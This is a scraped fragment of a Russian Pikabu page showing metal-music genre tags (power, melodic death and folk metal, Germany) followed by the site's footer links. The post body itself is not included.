Показать полностью 2 5
Metal Power Metal Melodic Death Metal Folk Metal Германия Видео YouTube Длиннопост
0
Посты не найдены
О нас
О Пикабу Контакты Реклама Сообщить об ошибке Сообщить о нарушении законодательства Отзывы и предложения Новости Пикабу Мобильное приложение RSS
Информация
Помощь Кодекс Пикабу Команда Пикабу Конфиденциальность Правила соцсети О рекомендациях О компании
Наши проекты
Блоги Работа Промокоды Игры Курсы
Партнёры
Промокоды Биг Гик Промокоды Lamoda Промокоды Мвидео Промокоды Яндекс Маркет Промокоды Пятерочка Промокоды Aroma Butik Промокоды Яндекс Путешествия Промокоды Яндекс Еда Постила Футбол сегодня
На информационном ресурсе Pikabu.ru применяются рекомендательные технологии